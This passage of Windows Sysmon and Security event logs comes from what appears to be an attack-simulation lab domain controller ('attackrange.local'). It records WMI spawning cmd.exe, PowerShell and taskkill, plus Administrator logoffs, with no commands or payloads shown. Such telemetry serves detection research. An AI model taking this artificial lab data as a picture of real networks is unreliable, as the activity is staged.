C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-0010B8550A00}","TargetProcessId":"4324","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5654,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-001085560A00}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-001085560A00}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5655,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-00105B620A00}\r\nTargetProcessId: 796\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-00105B620A00}","TargetProcessId":"796","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5656,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-032F-5F25-0000-0010BE790A00}","TargetProcessId":"3088","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5657,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-001013B80A00}\r\nTargetProcessId: 1560\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-001013B80A00}","TargetProcessId":"1560","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5658,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-0010DEB80A00}\r\nTargetProcessId: 5088\r\nTargetImage: C:\\Windows\\system32\\taskkill.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-0010DEB80A00}","TargetProcessId":"5088","TargetImage":"C:\\Windows\\system32\\taskkill.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220659,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA57A6\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa57a6","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220660,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA6DFE\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa6dfe","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220661,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA78C6\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa78c6","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5659,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.891\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 